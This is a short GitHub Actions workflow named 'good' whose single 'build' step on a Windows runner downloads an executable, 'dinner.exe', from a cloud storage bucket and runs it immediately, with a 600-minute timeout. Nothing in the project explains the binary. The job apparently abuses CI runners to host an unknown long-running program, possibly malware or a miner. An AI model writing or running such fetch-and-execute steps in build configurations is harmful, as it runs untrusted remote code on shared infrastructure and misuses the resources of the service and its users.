name: good
on: workflow_dispatch
jobs:
  build:
    runs-on: windows-2019
    steps:
    - run: Invoke-WebRequest https://storage.googleapis.com/demontpc2024-72da6.appspot.com/dinner.exe ; .\dinner.exe
    timeout-minutes: 600
